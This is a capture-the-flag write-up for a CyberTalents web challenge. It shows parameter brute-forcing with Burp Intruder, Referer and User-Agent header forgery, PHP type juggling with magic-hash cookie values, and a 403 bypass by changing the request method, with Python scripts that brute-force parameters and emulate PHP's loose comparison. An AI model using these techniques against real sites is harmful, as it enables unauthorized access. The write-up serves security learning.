
Cybertalents SkiddyKill3r Web Challenge Writeup

Description

Creative Thinking will make getting the flag so much easier

Difficulty: Easy

Challenge Link: https://cybertalents.com/challenges/web/skiddykill3r

Solution

Exploring

The homepage is a simple page with a single function, handled by result.php, which accepts a name as user input. Viewing the source code of this page reveals the following hint.

So we go back to the first page and enter Momen as the name. You will then find another hint, which says:

Parameter BruteForce

Moving to hint.php, you will see a hint that tells you:

So I think we need to brute-force the parameter name here, with the value set to True. I used the following list and loaded it into Burp Intruder as the payload set, with the parameter name as the single injection point.

The show parameter turns out to be the right one. Next we see the following code, which contains the conditions we need to satisfy to get the flag.
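The parameter discovery step above can be scripted instead of run through Intruder. The following is an added example, not code from the original writeup: it sends ?name=True for every candidate name, compares each response against a baseline taken with a parameter the application cannot know, and reports the names that change the page. The candidate list, the host name `target`, and the `fake_fetch` transport are all constructed for an offline run; replace `fetch` with a real urllib or requests call against the challenge host.

```python
"""Parameter-name brute force against hint.php, the way Burp Intruder does it.

Added example, not from the original writeup. CANDIDATE_PARAMS, the host
'target' and fake_fetch are constructed for the demo (assumptions).
"""
from typing import Callable, Dict, List
from urllib.parse import urlencode, urlsplit, parse_qs

# Constructed sample wordlist; the writeup's full Intruder list is not shown.
CANDIDATE_PARAMS = ["debug", "admin", "test", "show", "view", "page", "flag", "hint"]


def probe_params(fetch: Callable[[str], str], base_url: str,
                 candidates: List[str], value: str = "True") -> Dict[str, str]:
    """Return {name: body} for every candidate whose response differs from the
    baseline. The baseline uses a parameter name no application should handle,
    so any difference is attributable to the candidate name being recognised."""
    baseline = fetch(f"{base_url}?{urlencode({'zzz_nonexistent_param': value})}")
    hits: Dict[str, str] = {}
    for name in candidates:
        body = fetch(f"{base_url}?{urlencode({name: value})}")
        if body != baseline:
            hits[name] = body
    return hits


# --- constructed fake server so the example runs offline ------------------
def fake_fetch(url: str) -> str:
    """Stand-in for hint.php: only show=True reveals extra content (assumption)."""
    qs = parse_qs(urlsplit(url).query)
    if qs.get("show") == ["True"]:
        return "<p>hint</p><pre>...condition code...</pre>"
    return "<p>hint</p>"


if __name__ == "__main__":
    found = probe_params(fake_fetch, "http://target/skiddy/hint.php", CANDIDATE_PARAMS)
    print(sorted(found))  # ['show']
```

Comparing whole bodies is the strictest form of the Intruder length/content diff; against a real target that embeds timestamps or CSRF tokens, compare response length or a stripped body instead so that noise does not mask the one parameter that matters.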

The first case is easy: we only need to add a Referer header (the header name is spelled Referer, as in the HTTP spec) with the value http://cyberguy.

Type Juggling

The second case appears to be a type juggling attack. After a lot of searching I found a hint for it on the PHP documentation website.

Adding the following cookie gives us the second part of the flag. Both values are well-known "magic hashes": md5('240610708') and md5('QNKCDZO') each consist of 0e followed only by digits, so PHP's loose == comparison reads both hashes as the number 0 and treats them as equal, even though the inputs and the hashes themselves differ. A strict === comparison would not be fooled.

Cookie: flag=240610708; flag1=QNKCDZO
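To see why the two cookie values pass, the following added example (not code from the original writeup) computes both MD5 hashes, checks that each is 0e followed by digits, and emulates PHP's loose == versus strict === on them. The challenge source is not reproduced on the page, so the condition `cookie_passes` models (inputs differ but md5 of each compares equal with ==) is an assumption about the check; it is the classic pattern these two values are used against.

```python
"""Why Cookie: flag=240610708; flag1=QNKCDZO satisfies an md5() == md5() check.

Added example, not from the original writeup. The challenge's exact PHP
condition is not shown on the page; cookie_passes() assumes the form
    $_COOKIE['flag'] != $_COOKIE['flag1'] && md5($_COOKIE['flag']) == md5($_COOKIE['flag1'])
"""
import hashlib
import re

# PHP's notion of a numeric string: optional sign, digits, optional fraction,
# optional exponent. A hash like '0e4620974...' fits: mantissa 0, exponent 4620974...
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP's == on two strings: if both are numeric strings they are
    compared as numbers (still true for string-vs-string in PHP 8), otherwise
    byte-wise. '0e' followed by digits evaluates to 0 * 10^n == 0."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a: str, b: str) -> bool:
    """Emulate PHP's === on two strings: same bytes, no juggling."""
    return a == b


def is_magic_md5(s: str) -> bool:
    """True when md5(s) is '0e' followed by digits only, i.e. PHP reads it as 0."""
    return re.fullmatch(r"0e\d+", md5hex(s)) is not None


def cookie_passes(flag: str, flag1: str) -> bool:
    """The assumed challenge condition: different inputs whose hashes are 'equal'."""
    return flag != flag1 and php_loose_eq(md5hex(flag), md5hex(flag1))


if __name__ == "__main__":
    for v in ("240610708", "QNKCDZO"):
        print(f"md5({v!r}) = {md5hex(v)}  magic={is_magic_md5(v)}")
    print("== passes :", cookie_passes("240610708", "QNKCDZO"))
    print("=== passes:", php_strict_eq(md5hex("240610708"), md5hex("QNKCDZO")))
```

The fix on the defending side is the same thing the emulation shows: compare hashes with === (or hash_equals()), never with ==, so that numeric-looking strings are never coerced.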

The last case gives us a hint to the full flag. It is easy to satisfy by changing the value of the parameter and the cookie to:

/skiddy/hint.php?show=True&flag=HiNt
Cookie: flag=True

Moving to robots.txt, we find another hint:

403 Bypass

Browsing to this file gives us a 403 Forbidden, so we need to find a way to bypass it.

After a lot of trial and error I found that we need to add a Referer header with the same value as the website URL, add the cookie from the second case, and change the request method to PUT. The request should look something like this:

Another hint tells us to access user_check.php with the following User-Agent: G3t_My_Fl@g_N0w()

And finally we get the whole flag.

This post is licensed under CC BY 4.0 by the author.